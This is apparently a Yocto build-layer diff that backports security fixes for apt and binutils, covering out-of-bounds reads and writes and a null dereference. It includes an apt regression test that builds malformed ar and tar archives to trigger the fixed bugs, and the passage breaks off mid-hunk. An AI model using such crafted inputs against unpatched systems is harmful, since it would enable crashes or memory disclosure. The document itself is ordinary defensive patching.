39USERADD_PARAM_${PN} = "--system --no-create-home --home-dir /nonexistent --shell /bin/false --user-group _apt" 45USERADD_PARAM_${PN} = "--system --no-create-home --home-dir /nonexistent --shell /bin/false --user-group _apt"
diff --git a/meta/recipes-devtools/apt/apt/CVE-2020-3810.patch b/meta/recipes-devtools/apt/apt/CVE-2020-3810.patch
new file mode 100644
index 0000000000..cf1206a3fa
--- /dev/null
+++ b/meta/recipes-devtools/apt/apt/CVE-2020-3810.patch
@@ -0,0 +1,174 @@
1From dceb1e49e4b8e4dadaf056be34088b415939cda6 Mon Sep 17 00:00:00 2001
2From: Julian Andres Klode <julian.klode@canonical.com>
3Date: Tue, 12 May 2020 11:49:09 +0200
4Subject: [PATCH] SECURITY UPDATE: Fix out of bounds read in .ar and .tar
5 implementation (CVE-2020-3810)
6
7When normalizing ar member names by removing trailing whitespace
8and slashes, an out-out-bound read can be caused if the ar member
9name consists only of such characters, because the code did not
10stop at 0, but would wrap around and continue reading from the
11stack, without any limit.
12
13Add a check to abort if we reached the first character in the
14name, effectively rejecting the use of names consisting just
15of slashes and spaces.
16
17Furthermore, certain error cases in arfile.cc and extracttar.cc have
18included member names in the output that were not checked at all and
19might hence not be nul terminated, leading to further out of bound reads.
20
21Fixes Debian/apt#111
22LP: #1878177
23
24CVE: CVE-2020-3810
25
26Upstream-Status: Backport:
27https://salsa.debian.org/apt-team/apt/-/commit/dceb1e49e4b8e4dadaf056be34088b415939cda6
28
29Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
30---
31apt-inst/contrib/arfile.cc | 11 ++-
32apt-inst/contrib/extracttar.cc | 2 +-
33.../test-github-111-invalid-armember | 88 +++++++++++++++++++
34 3 files changed, 98 insertions(+), 3 deletions(-)
35 create mode 100755 test/integration/test-github-111-invalid-armember
36
37diff --git a/apt-inst/contrib/arfile.cc b/st/contrib/arfile.cc
38index 3fc3afedb..5cb43c690 100644
39--- a/apt-inst/contrib/arfile.cc
40+++ b/apt-inst/contrib/arfile.cc
41@@ -92,7 +92,7 @@ bool ARArchive::LoadHeaders()
42 StrToNum(Head.Size,Memb->Size,sizeof(Head.Size)) == false)
43 {
44 delete Memb;
45- return _error->Error(_("Invalid archive member header %s"), Head.Name);
46+ return _error->Error(_("Invalid archive member header"));
47 }
48
49 // Check for an extra long name string
50@@ -119,7 +119,14 @@ bool ARArchive::LoadHeaders()
51 else
52 {
53 unsigned int I = sizeof(Head.Name) - 1;
54- for (; Head.Name[I] == ' ' || Head.Name[I] == '/'; I--);
55+ for (; Head.Name[I] == ' ' || Head.Name[I] == '/'; I--)
56+ {
57+ if (I == 0)
58+ {
59+ delete Memb;
60+ return _error->Error(_("Invalid archive member header"));
61+ }
62+ }
63 Memb->Name = std::string(Head.Name,I+1);
64 }
65
66diff --git a/apt-inst/contrib/extracttar.cc b/apt-inst/contrib/extracttar.cc
67index 9bb0a55c0..b22f59dbc 100644
68--- a/apt-inst/contrib/extracttar.cc
69+++ b/apt-inst/contrib/extracttar.cc
70@@ -254,7 +254,7 @@ bool ExtractTar::Go(pkgDirStream &Stream)
71
72 default:
73 BadRecord = true;
74- _error->Warning(_("Unknown TAR header type %u, member %s"),(unsigned)Tar->LinkFlag,Tar->Name);
75+ _error->Warning(_("Unknown TAR header type %u"), (unsigned)Tar->LinkFlag);
76 break;
77 }
78
79diff --git a/test/integration/test-github-111-invalid-armember b/test/integration/test-github-111-invalid-armember
80new file mode 100755
81index 000000000..ec2163bf6
82--- /dev/null
83+++ b/test/integration/test-github-111-invalid-armember
84@@ -0,0 +1,88 @@
85+#!/bin/sh
86+set -e
87+
88+TESTDIR="$(readlink -f "$(dirname "$0")")"
89+. "$TESTDIR/framework"
90+setupenvironment
91+configarchitecture "amd64"
92+setupaptarchive
93+
94+# this used to crash, but it should treat it as an invalid member header
95+touch ' '
96+ar -q test.deb ' '
97+testsuccessequal "E: Invalid archive member header" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb
98+
99+
100+rm test.deb
101+touch 'x'
102+ar -q test.deb 'x'
103+testsuccessequal "E: This is not a valid DEB archive, missing 'debian-binary' member" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb
104+
105+
106+# <name><size> [ other fields] - name is not nul terminated here, it ends in .
107+msgmsg "Unterminated ar member name"
108+printf '!<arch>\0120123456789ABCDE.A123456789A.01234.01234.0123456.012345678.0.' > test.deb
109+testsuccessequal "E: Invalid archive member header" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb
110+
111+
112+# unused source code for generating $tar below
113+maketar() {
114+ cat > maketar.c << EOF
115+ #include <stdio.h>
116+ #include <string.h>
117+ struct tar {
118+ char Name[100];
119+ char Mode[8];
120+ char UserID[8];
121+ char GroupID[8];
122+ char Size[12];
123+ char MTime[12];
124+ char Checksum[8];
125+ char LinkFlag;
126+ char LinkName[100];
127+ char MagicNumber[8];
128+ char UserName[32];
129+ char GroupName[32];
130+ char Major[8];
131+ char Minor[8];
132+ };
133+
134+ int main(void)
135+ {
136+ union {
137+ struct tar t;
138+ char buf[512];
139+ } t;
140+ for (int i = 0; i < sizeof(t.buf); i++)
141+ t.buf[i] = '7';
142+ memcpy(t.t.Name, "unterminatedName", 16);
143+ memcpy(t.t.UserName, "userName", 8);
144+ memcpy(t.t.GroupName, "thisIsAGroupNamethisIsAGroupName", 32);
145+ t.t.LinkFlag = 'X'; // I AM BROKEN
146+ memcpy(t.t.Size, "000000000000", sizeof(t.t.Size));
147+ memset(t.t.Checksum,' ',sizeof(t.t.Checksum));
148+
149+ unsigned long sum = 0;
150+ for (int i = 0; i < sizeof(t.buf); i++)
151+ sum += t.buf[i];
152+
153+ int written = sprintf(t.t.Checksum, "%lo", sum);
154+ for (int i = written; i < sizeof(t.t.Checksum); i++)
155+ t.t.Checksum[i] = ' ';
156+ fwrite(t.buf, sizeof(t.buf), 1, stdout);
157+ }
158+EOF
159+
160+ gcc maketar.c -o maketar -Wall
161+ ./maketar
162+}
163+
164+
165+#
166+tar="unterminatedName77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777700000000000077777777777773544 X777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777userName777777777777777777777777thisIsAGroupNamethisIsAGroupName777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777"
167+printf '%s' "$tar" | gzip > control.tar.gz
168+cp control.tar.gz data.tar.gz
169+touch debian-binary
170+rm test.deb
171+ar -q test.deb debian-binary control.tar.gz data.tar.gz
172+testsuccessequal "W: Unknown TAR header type 88" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb
173--
174GitLab
diff --git a/meta/recipes-devtools/binutils/binutils-2.34.inc b/meta/recipes-devtools/binutils/binutils-2.34.inc
index f557fe970c..032263fe63 100644
--- a/meta/recipes-devtools/binutils/binutils-2.34.inc
+++ b/meta/recipes-devtools/binutils/binutils-2.34.inc
@@ -24,7 +24,7 @@ BRANCH ?= "binutils-2_34-branch"
24 24
25UPSTREAM_CHECK_GITTAGREGEX = "binutils-(?P<pver>\d+_(\d_?)*)" 25UPSTREAM_CHECK_GITTAGREGEX = "binutils-(?P<pver>\d+_(\d_?)*)"
26 26
27SRCREV ?= "d4b50999b3b287b5f984ade2f8734aa8c9359440" 27SRCREV ?= "c4e78c0868a22971680217a41fdb73516a26813d"
28BINUTILS_GIT_URI ?= "git://sourceware.org/git/binutils-gdb.git;branch=${BRANCH};protocol=git" 28BINUTILS_GIT_URI ?= "git://sourceware.org/git/binutils-gdb.git;branch=${BRANCH};protocol=git"
29SRC_URI = "\ 29SRC_URI = "\
30 ${BINUTILS_GIT_URI} \ 30 ${BINUTILS_GIT_URI} \
@@ -42,9 +42,25 @@ SRC_URI = "\
42 file://0015-sync-with-OE-libtool-changes.patch \ 42 file://0015-sync-with-OE-libtool-changes.patch \
43 file://0016-Check-for-clang-before-checking-gcc-version.patch \ 43 file://0016-Check-for-clang-before-checking-gcc-version.patch \
44 file://0017-binutils-drop-redundant-program_name-definition-fno-.patch \ 44 file://0017-binutils-drop-redundant-program_name-definition-fno-.patch \
45 file://0018-Include-members-in-the-variable-table-used-when-reso.patch \
45 file://CVE-2020-0551.patch \ 46 file://CVE-2020-0551.patch \
46 file://0001-gas-improve-reproducibility-for-stabs-debugging-data.patch \ 47 file://0001-gas-improve-reproducibility-for-stabs-debugging-data.patch \
47 file://CVE-2020-16592.patch \ 48 file://CVE-2020-16592.patch \
48 file://CVE-2020-16598.patch \ 49 file://CVE-2020-16598.patch \
50 file://CVE-2021-20197.patch \
51 file://CVE-2021-3487.patch \
52 file://CVE-2021-3549.patch \
53 file://CVE-2020-16593.patch \
54 file://0001-CVE-2021-45078.patch \
55 file://CVE-2022-38533.patch \
56 file://CVE-2023-25588.patch \
57 file://CVE-2021-46174.patch \
58 file://CVE-2023-25584.patch \
59 file://CVE-2022-47007.patch \
60 file://CVE-2022-47008.patch \
61 file://CVE-2022-47010.patch \
62 file://CVE-2022-47011.patch \
63 file://CVE-2022-48063.patch \
64 file://CVE-2022-47695.patch \
49" 65"
50S = "${WORKDIR}/git" 66S = "${WORKDIR}/git"
diff --git a/meta/recipes-devtools/binutils/binutils/0001-CVE-2021-45078.patch b/meta/recipes-devtools/binutils/binutils/0001-CVE-2021-45078.patch
new file mode 100644
index 0000000000..2af82477ac
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/0001-CVE-2021-45078.patch
@@ -0,0 +1,257 @@
1From 161e87d12167b1e36193385485c1f6ce92f74f02 Mon Sep 17 00:00:00 2001
2From: Alan Modra <amodra@gmail.com>
3Date: Wed, 15 Dec 2021 11:48:42 +1030
4Subject: [PATCH] PR28694, Out-of-bounds write in stab_xcoff_builtin_type
5
6 PR 28694
7 * stabs.c (stab_xcoff_builtin_type): Make typenum unsigned.
8 Negate typenum earlier, simplifying bounds checking. Correct
9 off-by-one indexing. Adjust switch cases.
10
11
12CVE: CVE-2021-45078
13Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=patch;h=161e87d12167b1e36193385485c1f6ce92f74f02]
14
15Signed-off-by: Sundeep KOKKONDA <sundeep.kokkonda@gmail.com>
16Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com>
17Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com>
18---
19 binutils/stabs.c | 87 ++++++++++++++++++++++++------------------------
20 1 file changed, 43 insertions(+), 44 deletions(-)
21
22
23diff --git a/binutils/stabs.c b/binutils/stabs.c
24index 274bfb0e7fa..83ee3ea5fa4 100644
25--- a/binutils/stabs.c
26+++ b/binutils/stabs.c
27@@ -202,7 +202,7 @@ static debug_type stab_find_type (void *, struct stab_handle *, const int *);
28 static bfd_boolean stab_record_type
29 (void *, struct stab_handle *, const int *, debug_type);
30 static debug_type stab_xcoff_builtin_type
31- (void *, struct stab_handle *, int);
32+ (void *, struct stab_handle *, unsigned int);
33 static debug_type stab_find_tagged_type
34 (void *, struct stab_handle *, const char *, int, enum debug_type_kind);
35 static debug_type *stab_demangle_argtypes
36@@ -3496,166 +3496,167 @@ stab_record_type (void *dhandle ATTRIBUTE_UNUSED, struct stab_handle *info,
37
38 static debug_type
39 stab_xcoff_builtin_type (void *dhandle, struct stab_handle *info,
40- int typenum)
41+ unsigned int typenum)
42 {
43 debug_type rettype;
44 const char *name;
45
46- if (typenum >= 0 || typenum < -XCOFF_TYPE_COUNT)
47+ typenum = -typenum - 1;
48+ if (typenum >= XCOFF_TYPE_COUNT)
49 {
50- fprintf (stderr, _("Unrecognized XCOFF type %d\n"), typenum);
51+ fprintf (stderr, _("Unrecognized XCOFF type %d\n"), -typenum - 1);
52 return DEBUG_TYPE_NULL;
53 }
54- if (info->xcoff_types[-typenum] != NULL)
55- return info->xcoff_types[-typenum];
56+ if (info->xcoff_types[typenum] != NULL)
57+ return info->xcoff_types[typenum];
58
59- switch (-typenum)
60+ switch (typenum)
61 {
62- case 1:
63+ case 0:
64 /* The size of this and all the other types are fixed, defined
65 by the debugging format. */
66 name = "int";
67 rettype = debug_make_int_type (dhandle, 4, FALSE);
68 break;
69- case 2:
70+ case 1:
71 name = "char";
72 rettype = debug_make_int_type (dhandle, 1, FALSE);
73 break;
74- case 3:
75+ case 2:
76 name = "short";
77 rettype = debug_make_int_type (dhandle, 2, FALSE);
78 break;
79- case 4:
80+ case 3:
81 name = "long";
82 rettype = debug_make_int_type (dhandle, 4, FALSE);
83 break;
84- case 5:
85+ case 4:
86 name = "unsigned char";
87 rettype = debug_make_int_type (dhandle, 1, TRUE);
88 break;
89- case 6:
90+ case 5:
91 name = "signed char";
92 rettype = debug_make_int_type (dhandle, 1, FALSE);
93 break;
94- case 7:
95+ case 6:
96 name = "unsigned short";
97 rettype = debug_make_int_type (dhandle, 2, TRUE);
98 break;
99- case 8:
100+ case 7:
101 name = "unsigned int";
102 rettype = debug_make_int_type (dhandle, 4, TRUE);
103 break;
104- case 9:
105+ case 8:
106 name = "unsigned";
107 rettype = debug_make_int_type (dhandle, 4, TRUE);
108 break;
109- case 10:
110+ case 9:
111 name = "unsigned long";
112 rettype = debug_make_int_type (dhandle, 4, TRUE);
113 break;
114- case 11:
115+ case 10:
116 name = "void";
117 rettype = debug_make_void_type (dhandle);
118 break;
119- case 12:
120+ case 11:
121 /* IEEE single precision (32 bit). */
122 name = "float";
123 rettype = debug_make_float_type (dhandle, 4);
124 break;
125- case 13:
126+ case 12:
127 /* IEEE double precision (64 bit). */
128 name = "double";
129 rettype = debug_make_float_type (dhandle, 8);
130 break;
131- case 14:
132+ case 13:
133 /* This is an IEEE double on the RS/6000, and different machines
134 with different sizes for "long double" should use different
135 negative type numbers. See stabs.texinfo. */
136 name = "long double";
137 rettype = debug_make_float_type (dhandle, 8);
138 break;
139- case 15:
140+ case 14:
141 name = "integer";
142 rettype = debug_make_int_type (dhandle, 4, FALSE);
143 break;
144- case 16:
145+ case 15:
146 name = "boolean";
147 rettype = debug_make_bool_type (dhandle, 4);
148 break;
149- case 17:
150+ case 16:
151 name = "short real";
152 rettype = debug_make_float_type (dhandle, 4);
153 break;
154- case 18:
155+ case 17:
156 name = "real";
157 rettype = debug_make_float_type (dhandle, 8);
158 break;
159- case 19:
160+ case 18:
161 /* FIXME */
162 name = "stringptr";
163 rettype = NULL;
164 break;
165- case 20:
166+ case 19:
167 /* FIXME */
168 name = "character";
169 rettype = debug_make_int_type (dhandle, 1, TRUE);
170 break;
171- case 21:
172+ case 20:
173 name = "logical*1";
174 rettype = debug_make_bool_type (dhandle, 1);
175 break;
176- case 22:
177+ case 21:
178 name = "logical*2";
179 rettype = debug_make_bool_type (dhandle, 2);
180 break;
181- case 23:
182+ case 22:
183 name = "logical*4";
184 rettype = debug_make_bool_type (dhandle, 4);
185 break;
186- case 24:
187+ case 23:
188 name = "logical";
189 rettype = debug_make_bool_type (dhandle, 4);
190 break;
191- case 25:
192+ case 24:
193 /* Complex type consisting of two IEEE single precision values. */
194 name = "complex";
195 rettype = debug_make_complex_type (dhandle, 8);
196 break;
197- case 26:
198+ case 25:
199 /* Complex type consisting of two IEEE double precision values. */
200 name = "double complex";
201 rettype = debug_make_complex_type (dhandle, 16);
202 break;
203- case 27:
204+ case 26:
205 name = "integer*1";
206 rettype = debug_make_int_type (dhandle, 1, FALSE);
207 break;
208- case 28:
209+ case 27:
210 name = "integer*2";
211 rettype = debug_make_int_type (dhandle, 2, FALSE);
212 break;
213- case 29:
214+ case 28:
215 name = "integer*4";
216 rettype = debug_make_int_type (dhandle, 4, FALSE);
217 break;
218- case 30:
219+ case 29:
220 /* FIXME */
221 name = "wchar";
222 rettype = debug_make_int_type (dhandle, 2, FALSE);
223 break;
224- case 31:
225+ case 30:
226 name = "long long";
227 rettype = debug_make_int_type (dhandle, 8, FALSE);
228 break;
229- case 32:
230+ case 31:
231 name = "unsigned long long";
232 rettype = debug_make_int_type (dhandle, 8, TRUE);
233 break;
234- case 33:
235+ case 32:
236 name = "logical*8";
237 rettype = debug_make_bool_type (dhandle, 8);
238 break;
239- case 34:
240+ case 33:
241 name = "integer*8";
242 rettype = debug_make_int_type (dhandle, 8, FALSE);
243 break;
244@@ -3664,9 +3665,7 @@ stab_xcoff_builtin_type (void *dhandle, struct stab_handle *info,
245 }
246
247 rettype = debug_name_type (dhandle, name, rettype);
248-
249- info->xcoff_types[-typenum] = rettype;
250-
251+ info->xcoff_types[typenum] = rettype;
252 return rettype;
253 }
254
255--
2562.27.0
257
diff --git a/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch b/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch
index 11a8110d40..88cce49e46 100644
--- a/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch
+++ b/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch
@@ -1,4 +1,4 @@
1From 7b24f81e04c9d00d96de7dbd250beade6d2c6e44 Mon Sep 17 00:00:00 2001 1From 12b658c0fe5771d16067baef933b7f34ed455def Mon Sep 17 00:00:00 2001
2From: Khem Raj <raj.khem@gmail.com> 2From: Khem Raj <raj.khem@gmail.com>
3Date: Fri, 15 Jan 2016 06:31:09 +0000 3Date: Fri, 15 Jan 2016 06:31:09 +0000
4Subject: [PATCH] warn for uses of system directories when cross linking 4Subject: [PATCH] warn for uses of system directories when cross linking
@@ -59,8 +59,8 @@ Signed-off-by: Khem Raj <raj.khem@gmail.com>
59 ld/ldfile.c | 17 +++++++++++++++++ 59 ld/ldfile.c | 17 +++++++++++++++++
60 ld/ldlex.h | 2 ++ 60 ld/ldlex.h | 2 ++
61 ld/ldmain.c | 2 ++ 61 ld/ldmain.c | 2 ++
62 ld/lexsup.c | 15 +++++++++++++++ 62 ld/lexsup.c | 16 ++++++++++++++++
63 9 files changed, 85 insertions(+) 63 9 files changed, 86 insertions(+)
64 64
65diff --git a/ld/config.in b/ld/config.in 65diff --git a/ld/config.in b/ld/config.in
66index d93c9b0830..5da2742bea 100644 66index d93c9b0830..5da2742bea 100644
@@ -77,10 +77,10 @@ index d93c9b0830..5da2742bea 100644
77 #undef EXTRA_SHLIB_EXTENSION 77 #undef EXTRA_SHLIB_EXTENSION
78 78
79diff --git a/ld/configure b/ld/configure 79diff --git a/ld/configure b/ld/configure
80index 811134a503..f8c17c19ae 100755 80index f432f4637d..a9da3c115e 100755
81--- a/ld/configure 81--- a/ld/configure
82+++ b/ld/configure 82+++ b/ld/configure
83@@ -826,6 +826,7 @@ with_lib_path 83@@ -830,6 +830,7 @@ with_lib_path
84 enable_targets 84 enable_targets
85 enable_64_bit_bfd 85 enable_64_bit_bfd
86 with_sysroot 86 with_sysroot
@@ -88,7 +88,7 @@ index 811134a503..f8c17c19ae 100755
88 enable_gold 88 enable_gold
89 enable_got 89 enable_got
90 enable_compressed_debug_sections 90 enable_compressed_debug_sections
91@@ -1491,6 +1492,8 @@ Optional Features: 91@@ -1495,6 +1496,8 @@ Optional Features:
92 --disable-largefile omit support for large files 92 --disable-largefile omit support for large files
93 --enable-targets alternative target configurations 93 --enable-targets alternative target configurations
94 --enable-64-bit-bfd 64-bit support (on hosts with narrower word sizes) 94 --enable-64-bit-bfd 64-bit support (on hosts with narrower word sizes)
@@ -97,7 +97,7 @@ index 811134a503..f8c17c19ae 100755
97 --enable-gold[=ARG] build gold [ARG={default,yes,no}] 97 --enable-gold[=ARG] build gold [ARG={default,yes,no}]
98 --enable-got=<type> GOT handling scheme (target, single, negative, 98 --enable-got=<type> GOT handling scheme (target, single, negative,
99 multigot) 99 multigot)
100@@ -15788,6 +15791,19 @@ fi 100@@ -16624,6 +16627,19 @@ fi
101 101
102 102
103 103
@@ -222,10 +222,10 @@ index 5287f19a7f..55096e4fc9 100644
222 222
223 /* The initial parser states. */ 223 /* The initial parser states. */
224diff --git a/ld/ldmain.c b/ld/ldmain.c 224diff --git a/ld/ldmain.c b/ld/ldmain.c
225index da1ad17763..12d0b07d8a 100644 225index c4af10f4e9..95b56b2d2d 100644
226--- a/ld/ldmain.c 226--- a/ld/ldmain.c
227+++ b/ld/ldmain.c 227+++ b/ld/ldmain.c
228@@ -274,6 +274,8 @@ main (int argc, char **argv) 228@@ -273,6 +273,8 @@ main (int argc, char **argv)
229 command_line.warn_mismatch = TRUE; 229 command_line.warn_mismatch = TRUE;
230 command_line.warn_search_mismatch = TRUE; 230 command_line.warn_search_mismatch = TRUE;
231 command_line.check_section_addresses = -1; 231 command_line.check_section_addresses = -1;
@@ -235,7 +235,7 @@ index da1ad17763..12d0b07d8a 100644
235 /* We initialize DEMANGLING based on the environment variable 235 /* We initialize DEMANGLING based on the environment variable
236 COLLECT_NO_DEMANGLE. The gcc collect2 program will demangle the 236 COLLECT_NO_DEMANGLE. The gcc collect2 program will demangle the
237diff --git a/ld/lexsup.c b/ld/lexsup.c 237diff --git a/ld/lexsup.c b/ld/lexsup.c
238index 3d15cc491d..0e8b4f2b7a 100644 238index 3d15cc491d..6478821443 100644
239--- a/ld/lexsup.c 239--- a/ld/lexsup.c
240+++ b/ld/lexsup.c 240+++ b/ld/lexsup.c
241@@ -550,6 +550,14 @@ static const struct ld_option ld_options[] = 241@@ -550,6 +550,14 @@ static const struct ld_option ld_options[] =
@@ -253,10 +253,10 @@ index 3d15cc491d..0e8b4f2b7a 100644
253 }; 253 };
254 254
255 #define OPTION_COUNT ARRAY_SIZE (ld_options) 255 #define OPTION_COUNT ARRAY_SIZE (ld_options)
256@@ -1603,6 +1611,13 @@ parse_args (unsigned argc, char **argv) 256@@ -1604,6 +1612,14 @@ parse_args (unsigned argc, char **argv)
257
258 case OPTION_PRINT_MAP_DISCARDED: 257 case OPTION_PRINT_MAP_DISCARDED:
259 config.print_map_discarded = TRUE; 258 config.print_map_discarded = TRUE;
259 break;
260+ 260+
261+ case OPTION_NO_POISON_SYSTEM_DIRECTORIES: 261+ case OPTION_NO_POISON_SYSTEM_DIRECTORIES:
262+ command_line.poison_system_directories = FALSE; 262+ command_line.poison_system_directories = FALSE;
@@ -264,6 +264,6 @@ index 3d15cc491d..0e8b4f2b7a 100644
264+ 264+
265+ case OPTION_ERROR_POISON_SYSTEM_DIRECTORIES: 265+ case OPTION_ERROR_POISON_SYSTEM_DIRECTORIES:
266+ command_line.error_poison_system_directories = TRUE; 266+ command_line.error_poison_system_directories = TRUE;
267 break; 267+ break;
268 } 268 }
269 } 269 }
diff --git a/meta/recipes-devtools/binutils/binutils/0018-Include-members-in-the-variable-table-used-when-reso.patch b/meta/recipes-devtools/binutils/binutils/0018-Include-members-in-the-variable-table-used-when-reso.patch
new file mode 100644
index 0000000000..dc1e09d46b
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/0018-Include-members-in-the-variable-table-used-when-reso.patch
@@ -0,0 +1,32 @@
1From bf2252dca8c76e4c1f1c2dbf98dab7ffc9f5e5af Mon Sep 17 00:00:00 2001
2From: Nick Clifton <nickc@redhat.com>
3Date: Sat, 29 Aug 2020 08:03:15 +0100
4Subject: [PATCH] Include members in the variable table used when resolving
5 DW_AT_specification tags.
6
7 PR 26520
8 * dwarf2.c (scan_unit_for_symbols): Add member entries to the
9 variable table.
10
11Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=e6f04d55f681149a69102a73937d0987719c3f16]
12---
13 bfd/dwarf2.c | 3 ++-
14 1 file changed, 2 insertions(+), 1 deletion(-)
15
16diff --git a/bfd/dwarf2.c b/bfd/dwarf2.c
17index dd3568a8532..ef2f6a3c63c 100644
18--- a/bfd/dwarf2.c
19+++ b/bfd/dwarf2.c
20@@ -3248,7 +3248,8 @@ scan_unit_for_symbols (struct comp_unit *unit)
21 else
22 {
23 func = NULL;
24- if (abbrev->tag == DW_TAG_variable)
25+ if (abbrev->tag == DW_TAG_variable
26+ || abbrev->tag == DW_TAG_member)
27 {
28 bfd_size_type amt = sizeof (struct varinfo);
29 var = (struct varinfo *) bfd_zalloc (abfd, amt);
30--
312.34.1
32
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch b/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch
new file mode 100644
index 0000000000..c7c7829261
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch
@@ -0,0 +1,204 @@
1From aec72fda3b320c36eb99fc1c4cf95b10fc026729 Mon Sep 17 00:00:00 2001
2From: Alan Modra <amodra@gmail.com>
3Date: Thu, 16 Apr 2020 17:49:38 +0930
4Subject: [PATCH] PR25827, Null pointer dereferencing in scan_unit_for_symbols
5
6 PR 25827
7 * dwarf2.c (scan_unit_for_symbols): Wrap overlong lines. Don't
8 strdup(0).
9
10Upstream-Status: Backport
11https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=aec72fda3b320c36eb99fc1c4cf95b10fc026729
12CVE: CVE-2020-16593
13Signed-off-by: Armin Kuster <akuster@mvista.com>
14
15
16Index: git/bfd/dwarf2.c
17===================================================================
18--- git.orig/bfd/dwarf2.c
19+++ git/bfd/dwarf2.c
20@@ -295,12 +295,12 @@ struct comp_unit
21 /* This data structure holds the information of an abbrev. */
22 struct abbrev_info
23 {
24- unsigned int number; /* Number identifying abbrev. */
25- enum dwarf_tag tag; /* DWARF tag. */
26- int has_children; /* Boolean. */
27- unsigned int num_attrs; /* Number of attributes. */
28- struct attr_abbrev *attrs; /* An array of attribute descriptions. */
29- struct abbrev_info *next; /* Next in chain. */
30+ unsigned int number; /* Number identifying abbrev. */
31+ enum dwarf_tag tag; /* DWARF tag. */
32+ bfd_boolean has_children; /* TRUE if the abbrev has children. */
33+ unsigned int num_attrs; /* Number of attributes. */
34+ struct attr_abbrev * attrs; /* An array of attribute descriptions. */
35+ struct abbrev_info * next; /* Next in chain. */
36 };
37
38 struct attr_abbrev
39@@ -1487,6 +1487,8 @@ struct varinfo
40 {
41 /* Pointer to previous variable in list of all variables */
42 struct varinfo *prev_var;
43+ /* The offset of the varinfo from the start of the unit. */
44+ bfd_uint64_t unit_offset;
45 /* Source location file name */
46 char *file;
47 /* Source location line number */
48@@ -1497,7 +1499,7 @@ struct varinfo
49 /* Where the symbol is defined */
50 asection *sec;
51 /* Is this a stack variable? */
52- unsigned int stack: 1;
53+ bfd_boolean stack;
54 };
55
56 /* Return TRUE if NEW_LINE should sort after LINE. */
57@@ -2871,7 +2873,7 @@ lookup_symbol_in_variable_table (struct
58 struct varinfo* each;
59
60 for (each = unit->variable_table; each; each = each->prev_var)
61- if (each->stack == 0
62+ if (! each->stack
63 && each->file != NULL
64 && each->name != NULL
65 && each->addr == addr
66@@ -3166,6 +3168,20 @@ read_rangelist (struct comp_unit *unit,
67 return TRUE;
68 }
69
70+static struct varinfo *
71+lookup_var_by_offset (bfd_uint64_t offset, struct varinfo * table)
72+{
73+ while (table)
74+ {
75+ if (table->unit_offset == offset)
76+ return table;
77+ table = table->prev_var;
78+ }
79+
80+ return NULL;
81+}
82+
83+
84 /* DWARF2 Compilation unit functions. */
85
86 /* Scan over each die in a comp. unit looking for functions to add
87@@ -3202,6 +3218,9 @@ scan_unit_for_symbols (struct comp_unit
88 bfd_vma low_pc = 0;
89 bfd_vma high_pc = 0;
90 bfd_boolean high_pc_relative = FALSE;
91+ bfd_uint64_t current_offset;
92+
93+ current_offset = info_ptr - unit->info_ptr_unit;
94
95 /* PR 17512: file: 9f405d9d. */
96 if (info_ptr >= info_ptr_end)
97@@ -3234,12 +3253,13 @@ scan_unit_for_symbols (struct comp_unit
98 goto fail;
99 }
100
101- var = NULL;
102 if (abbrev->tag == DW_TAG_subprogram
103 || abbrev->tag == DW_TAG_entry_point
104 || abbrev->tag == DW_TAG_inlined_subroutine)
105 {
106 bfd_size_type amt = sizeof (struct funcinfo);
107+
108+ var = NULL;
109 func = (struct funcinfo *) bfd_zalloc (abfd, amt);
110 if (func == NULL)
111 goto fail;
112@@ -3268,13 +3288,15 @@ scan_unit_for_symbols (struct comp_unit
113 if (var == NULL)
114 goto fail;
115 var->tag = abbrev->tag;
116- var->stack = 1;
117+ var->stack = TRUE;
118 var->prev_var = unit->variable_table;
119 unit->variable_table = var;
120+ var->unit_offset = current_offset;
121 /* PR 18205: Missing debug information can cause this
122 var to be attached to an already cached unit. */
123 }
124-
125+ else
126+ var = NULL;
127 /* No inline function in scope at this nesting level. */
128 nested_funcs[nesting_level].func = 0;
129 }
130@@ -3362,6 +3384,33 @@ scan_unit_for_symbols (struct comp_unit
131 {
132 switch (attr.name)
133 {
134+ case DW_AT_specification:
135+ if (attr.u.val)
136+ {
137+ struct varinfo * spec_var;
138+
139+ spec_var = lookup_var_by_offset (attr.u.val,
140+ unit->variable_table);
141+ if (spec_var == NULL)
142+ {
143+ _bfd_error_handler (_("DWARF error: could not find "
144+ "variable specification "
145+ "at offset %lx"),
146+ (unsigned long) attr.u.val);
147+ break;
148+ }
149+
150+ if (var->name == NULL)
151+ var->name = spec_var->name;
152+ if (var->file == NULL && spec_var->file != NULL)
153+ var->file = strdup (spec_var->file);
154+ if (var->line == 0)
155+ var->line = spec_var->line;
156+ if (var->sec == NULL)
157+ var->sec = spec_var->sec;
158+ }
159+ break;
160+
161 case DW_AT_name:
162 if (is_str_attr (attr.form))
163 var->name = attr.u.str;
164@@ -3378,7 +3427,7 @@ scan_unit_for_symbols (struct comp_unit
165
166 case DW_AT_external:
167 if (attr.u.val != 0)
168- var->stack = 0;
169+ var->stack = FALSE;
170 break;
171
172 case DW_AT_location:
173@@ -3392,7 +3441,7 @@ scan_unit_for_symbols (struct comp_unit
174 if (attr.u.blk->data != NULL
